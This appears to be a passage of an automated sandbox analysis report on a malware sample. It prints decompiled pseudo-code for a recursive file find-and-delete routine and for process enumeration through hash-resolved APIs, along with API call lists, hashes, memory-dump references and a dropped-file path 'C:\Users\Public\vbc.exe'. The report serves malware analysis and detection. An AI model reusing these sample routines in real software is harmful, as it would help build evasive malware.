                                                                                                                                                                                                          0x72e31cc8
                                                                                                                                                                                                          0x72e31cc9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31ccb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31b83
                                                                                                                                                                                                          0x72e31b83
                                                                                                                                                                                                          0x72e31b86
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31b86
                                                                                                                                                                                                          0x72e31b7d
                                                                                                                                                                                                          0x72e31b6b
                                                                                                                                                                                                          0x72e31b6f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31b71
                                                                                                                                                                                                          0x72e31b74
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31b74
                                                                                                                                                                                                          0x72e31b05
                                                                                                                                                                                                          0x72e31b08
                                                                                                                                                                                                          0x72e31b3e
                                                                                                                                                                                                          0x72e31b41
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31b47
                                                                                                                                                                                                          0x72e31b49
                                                                                                                                                                                                          0x72e31b4d
                                                                                                                                                                                                          0x72e31b54
                                                                                                                                                                                                          0x72e31b5b
                                                                                                                                                                                                          0x72e31b5e
                                                                                                                                                                                                          0x72e31b61
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31b61
                                                                                                                                                                                                          0x72e31b41
                                                                                                                                                                                                          0x72e31b0a
                                                                                                                                                                                                          0x72e31b0b
                                                                                                                                                                                                          0x72e31b26
                                                                                                                                                                                                          0x72e31b29
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31b2f
                                                                                                                                                                                                          0x72e31b2f
                                                                                                                                                                                                          0x72e31b36
                                                                                                                                                                                                          0x72e31b39
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31b39
                                                                                                                                                                                                          0x72e31b29
                                                                                                                                                                                                          0x72e31b10
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31b16
                                                                                                                                                                                                          0x72e31b16
                                                                                                                                                                                                          0x72e31b1d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31b1d
                                                                                                                                                                                                          0x72e31b10
                                                                                                                                                                                                          0x72e31d09
                                                                                                                                                                                                          0x72e31d0e
                                                                                                                                                                                                          0x72e31d13
                                                                                                                                                                                                          0x72e31d17
                                                                                                                                                                                                          0x72e321c6
                                                                                                                                                                                                          0x72e321cc
                                                                                                                                                                                                          0x72e31d29
                                                                                                                                                                                                          0x72e31d2b
                                                                                                                                                                                                          0x72e31d2c
                                                                                                                                                                                                          0x72e320f1
                                                                                                                                                                                                          0x72e320f1
                                                                                                                                                                                                          0x72e320f4
                                                                                                                                                                                                          0x72e320f7
                                                                                                                                                                                                          0x72e32114
                                                                                                                                                                                                          0x72e3211a
                                                                                                                                                                                                          0x72e3211c
                                                                                                                                                                                                          0x72e32122
                                                                                                                                                                                                          0x72e32139
                                                                                                                                                                                                          0x72e32139
                                                                                                                                                                                                          0x72e32139
                                                                                                                                                                                                          0x72e32146
                                                                                                                                                                                                          0x72e3214c
                                                                                                                                                                                                          0x72e3214f
                                                                                                                                                                                                          0x72e32155
                                                                                                                                                                                                          0x72e32157
                                                                                                                                                                                                          0x72e3215a
                                                                                                                                                                                                          0x72e3215c
                                                                                                                                                                                                          0x72e32163
                                                                                                                                                                                                          0x72e32168
                                                                                                                                                                                                          0x72e3216b
                                                                                                                                                                                                          0x72e3216d
                                                                                                                                                                                                          0x72e32172
                                                                                                                                                                                                          0x72e32184
                                                                                                                                                                                                          0x72e32184
                                                                                                                                                                                                          0x72e32172
                                                                                                                                                                                                          0x72e3216b
                                                                                                                                                                                                          0x72e3215a
                                                                                                                                                                                                          0x72e3218a
                                                                                                                                                                                                          0x72e3218d
                                                                                                                                                                                                          0x72e32197
                                                                                                                                                                                                          0x72e3219f
                                                                                                                                                                                                          0x72e321ab
                                                                                                                                                                                                          0x72e321b1
                                                                                                                                                                                                          0x72e321b4
                                                                                                                                                                                                          0x72e320e6
                                                                                                                                                                                                          0x72e320e6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e320e6
                                                                                                                                                                                                          0x72e321ba
                                                                                                                                                                                                          0x72e321c0
                                                                                                                                                                                                          0x72e321c0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e321c2
                                                                                                                                                                                                          0x72e321c2
                                                                                                                                                                                                          0x72e321c2
                                                                                                                                                                                                          0x72e321c2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3218f
                                                                                                                                                                                                          0x72e3218f
                                                                                                                                                                                                          0x72e32195
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32195
                                                                                                                                                                                                          0x72e3218d
                                                                                                                                                                                                          0x72e32125
                                                                                                                                                                                                          0x72e3212b
                                                                                                                                                                                                          0x72e3212d
                                                                                                                                                                                                          0x72e32133
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32133
                                                                                                                                                                                                          0x72e320f9
                                                                                                                                                                                                          0x72e32100
                                                                                                                                                                                                          0x72e32106
                                                                                                                                                                                                          0x72e3210c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3210c
                                                                                                                                                                                                          0x72e31d32
                                                                                                                                                                                                          0x72e31d33
                                                                                                                                                                                                          0x72e320d0
                                                                                                                                                                                                          0x72e320d0
                                                                                                                                                                                                          0x72e320d6
                                                                                                                                                                                                          0x72e320d9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e320e0
                                                                                                                                                                                                          0x72e320e5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e320e5
                                                                                                                                                                                                          0x72e31d3a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31d40
                                                                                                                                                                                                          0x72e31d40
                                                                                                                                                                                                          0x72e31d49
                                                                                                                                                                                                          0x72e31d4e
                                                                                                                                                                                                          0x72e31d54
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31d5a
                                                                                                                                                                                                          0x72e31d67
                                                                                                                                                                                                          0x72e31d6d
                                                                                                                                                                                                          0x72e31d77
                                                                                                                                                                                                          0x72e31d7d
                                                                                                                                                                                                          0x72e31d85
                                                                                                                                                                                                          0x72e31d95
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31d95

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 72E31215: GlobalAlloc.KERNEL32(00000040,72E31233,?,72E312CF,-72E3404B,72E311AB,-000000A0), ref: 72E3121D
                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 72E31BC4
                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 72E31C0C
                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 72E31C16
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E31C29
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 72E31D09
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 72E31D0E
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 72E31D13
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E31EFA
                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 72E32098
                                                                                                                                                                                                          • GetModuleHandleA.KERNELBASE(00000008), ref: 72E32114
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000008), ref: 72E32125
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 72E3217E
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000408), ref: 72E32198
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 245916457-0
                                                                                                                                                                                                          • Opcode ID: 7eb13c7d947b525850fa274e08903134187d7c720bd20941439d5fdfc2e13ff0
                                                                                                                                                                                                          • Instruction ID: 4dad9d2b2c5bf68a072bec29d6dc6d1cc6d5dec442013037195bf9b567632956
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7eb13c7d947b525850fa274e08903134187d7c720bd20941439d5fdfc2e13ff0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B227971D042499FCB138FA9C9807EDBBF5BB0530BF90E52ED196AA182D7745981CB90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405A15, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                                          			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CD3(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4e8 =  *0x42f4e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040624D(0x42b8c0, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C2C(_t73);
					} else {
						lstrcatA(0x42b8c0, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E0040624D(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059CD(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405374(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4e8 =  *0x42f4e8 + 1;
										} else {
											E00405374(0xfffffff1, _t73);
											E0040602C(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A15(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b8c0 - 0x5c;
					if( *0x42b8c0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065C1(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BE5(_t73);
							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405374(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405374(0xfffffff1, _t73);
							return E0040602C(_t72, _t73, 0);
						}
						L33:
						 *0x42f4e8 =  *0x42f4e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                                                                                                                                                                          0x00405a1f
                                                                                                                                                                                                          0x00405a24
                                                                                                                                                                                                          0x00405a2d
                                                                                                                                                                                                          0x00405a30
                                                                                                                                                                                                          0x00405a38
                                                                                                                                                                                                          0x00405a3b
                                                                                                                                                                                                          0x00405a3e
                                                                                                                                                                                                          0x00405a46
                                                                                                                                                                                                          0x00405a48
                                                                                                                                                                                                          0x00405a49
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405a49
                                                                                                                                                                                                          0x00405a54
                                                                                                                                                                                                          0x00405a57
                                                                                                                                                                                                          0x00405a57
                                                                                                                                                                                                          0x00405a57
                                                                                                                                                                                                          0x00405a5b
                                                                                                                                                                                                          0x00405a6e
                                                                                                                                                                                                          0x00405a75
                                                                                                                                                                                                          0x00405a7a
                                                                                                                                                                                                          0x00405a7e
                                                                                                                                                                                                          0x00405a8e
                                                                                                                                                                                                          0x00405a80
                                                                                                                                                                                                          0x00405a86
                                                                                                                                                                                                          0x00405a86
                                                                                                                                                                                                          0x00405a93
                                                                                                                                                                                                          0x00405a96
                                                                                                                                                                                                          0x00405aa1
                                                                                                                                                                                                          0x00405aa7
                                                                                                                                                                                                          0x00405aac
                                                                                                                                                                                                          0x00405abc
                                                                                                                                                                                                          0x00405abe
                                                                                                                                                                                                          0x00405ac4
                                                                                                                                                                                                          0x00405ac7
                                                                                                                                                                                                          0x00405aca
                                                                                                                                                                                                          0x00405b82
                                                                                                                                                                                                          0x00405b82
                                                                                                                                                                                                          0x00405b86
                                                                                                                                                                                                          0x00405b88
                                                                                                                                                                                                          0x00405b88
                                                                                                                                                                                                          0x00405b88
                                                                                                                                                                                                          0x00405b88
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405ad0
                                                                                                                                                                                                          0x00405ad0
                                                                                                                                                                                                          0x00405ad9
                                                                                                                                                                                                          0x00405adf
                                                                                                                                                                                                          0x00405ae4
                                                                                                                                                                                                          0x00405ae7
                                                                                                                                                                                                          0x00405ae9
                                                                                                                                                                                                          0x00405aed
                                                                                                                                                                                                          0x00405aef
                                                                                                                                                                                                          0x00405aef
                                                                                                                                                                                                          0x00405aed
                                                                                                                                                                                                          0x00405af2
                                                                                                                                                                                                          0x00405af5
                                                                                                                                                                                                          0x00405b08
                                                                                                                                                                                                          0x00405b0a
                                                                                                                                                                                                          0x00405b0f
                                                                                                                                                                                                          0x00405b16
                                                                                                                                                                                                          0x00405b31
                                                                                                                                                                                                          0x00405b36
                                                                                                                                                                                                          0x00405b38
                                                                                                                                                                                                          0x00405b5c
                                                                                                                                                                                                          0x00405b3a
                                                                                                                                                                                                          0x00405b3a
                                                                                                                                                                                                          0x00405b3d
                                                                                                                                                                                                          0x00405b51
                                                                                                                                                                                                          0x00405b3f
                                                                                                                                                                                                          0x00405b42
                                                                                                                                                                                                          0x00405b4a
                                                                                                                                                                                                          0x00405b4a
                                                                                                                                                                                                          0x00405b3d
                                                                                                                                                                                                          0x00405b18
                                                                                                                                                                                                          0x00405b1e
                                                                                                                                                                                                          0x00405b20
                                                                                                                                                                                                          0x00405b26
                                                                                                                                                                                                          0x00405b26
                                                                                                                                                                                                          0x00405b20
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405b16
                                                                                                                                                                                                          0x00405af7
                                                                                                                                                                                                          0x00405afa
                                                                                                                                                                                                          0x00405afc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405afe
                                                                                                                                                                                                          0x00405b00
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405b02
                                                                                                                                                                                                          0x00405b06
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405b61
                                                                                                                                                                                                          0x00405b6b
                                                                                                                                                                                                          0x00405b71
                                                                                                                                                                                                          0x00405b71
                                                                                                                                                                                                          0x00405b7c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405b7c
                                                                                                                                                                                                          0x00405a98
                                                                                                                                                                                                          0x00405a9f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405a5d
                                                                                                                                                                                                          0x00405a5d
                                                                                                                                                                                                          0x00405a5f
                                                                                                                                                                                                          0x00405b8c
                                                                                                                                                                                                          0x00405b8e
                                                                                                                                                                                                          0x00405b91
                                                                                                                                                                                                          0x00405be2
                                                                                                                                                                                                          0x00405be2
                                                                                                                                                                                                          0x00405be2
                                                                                                                                                                                                          0x00405b93
                                                                                                                                                                                                          0x00405b96
                                                                                                                                                                                                          0x00405ba1
                                                                                                                                                                                                          0x00405ba6
                                                                                                                                                                                                          0x00405ba8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405bab
                                                                                                                                                                                                          0x00405bb7
                                                                                                                                                                                                          0x00405bbc
                                                                                                                                                                                                          0x00405bbe
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405bd9
                                                                                                                                                                                                          0x00405bc0
                                                                                                                                                                                                          0x00405bc3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405bc8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405bcf
                                                                                                                                                                                                          0x00405b98
                                                                                                                                                                                                          0x00405b98
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405b98
                                                                                                                                                                                                          0x00405a65
                                                                                                                                                                                                          0x00405a68
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405a68

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DeleteFileA.KERNELBASE(?,?,76712754,766F13E0,00000000), ref: 00405A3E
                                                                                                                                                                                                          • lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,76712754,766F13E0,00000000), ref: 00405A86
                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,76712754,766F13E0,00000000), ref: 00405AA7
                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,76712754,766F13E0,00000000), ref: 00405AAD
                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,76712754,766F13E0,00000000), ref: 00405ABE
                                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405B7C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                          • String ID: "C:\Users\Public\vbc.exe" $\*.*
                                                                                                                                                                                                          • API String ID: 2035342205-1024247051
                                                                                                                                                                                                          • Opcode ID: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                                                                                                                                          • Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 722F4225, Relevance: 4.6, APIs: 3, Instructions: 52processCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E722F4225(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v544;
				void* _v580;
				struct tagPROCESSENTRY32W* _t25;

				_v8 = E722F458C();
				_v16 = E722F4634(_v8, 0xea31d3b6);
				_v20 = E722F4634(_v8, 0x5c7bf6e9);
				_v24 = E722F4634(_v8, 0x873d1860);
				_v12 = CreateToolhelp32Snapshot(2, 0);
				if(_v12 != 0xffffffff) {
					_v580 = 0x22c;
					_t25 =  &_v580;
					Process32FirstW(_v12, _t25);
					if(_t25 != 0) {
						while(E722F41E1( &_v544) != _a4) {
							if(Process32NextW(_v12,  &_v580) != 0) {
								continue;
							}
							return 0;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}











                                                                                                                                                                                                          0x722f4233
                                                                                                                                                                                                          0x722f4243
                                                                                                                                                                                                          0x722f4253
                                                                                                                                                                                                          0x722f4263
                                                                                                                                                                                                          0x722f426d
                                                                                                                                                                                                          0x722f4274
                                                                                                                                                                                                          0x722f427a
                                                                                                                                                                                                          0x722f4284
                                                                                                                                                                                                          0x722f428e
                                                                                                                                                                                                          0x722f4293
                                                                                                                                                                                                          0x722f4299
                                                                                                                                                                                                          0x722f42be
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f42c0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f42ac
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f4295
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 722F426A
                                                                                                                                                                                                          • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 722F428E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167863165.00000000722F3000.00000040.00020000.sdmp, Offset: 722F0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167849303.00000000722F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167854070.00000000722F1000.00000080.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167858720.00000000722F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167867973.00000000722F5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2353314856-0
                                                                                                                                                                                                          • Opcode ID: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                                                                                                                                                          • Instruction ID: 83990cd622ead0c82555f66ccf723171e25f8eccc97857c353b940cbae8d1a8b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C111570E1020AAADB11DFB8CC48FADFBB8EF04314F1045B5EB15E2258E7B48B91DA51
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004065C1, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004065C1(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c108); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c108;
			}




                                                                                                                                                                                                          0x004065cc
                                                                                                                                                                                                          0x004065d5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004065e2
                                                                                                                                                                                                          0x004065d8
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(76712754,0042C108,0042BCC0,00405D16,0042BCC0,0042BCC0,00000000,0042BCC0,0042BCC0,76712754,?,766F13E0,00405A35,?,76712754,766F13E0), ref: 004065CC
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004065D8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                          • Opcode ID: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                                                                                                                                          • Instruction ID: 5989989b5290daefe0063212e93516784f0ef67bd1aed84395a1ba9114d6aba9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BD01231508130ABC7455B387D4C85B7A98AF153317618A37F466F12E4C734CC228698
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403A60, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                          			E00403A60(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
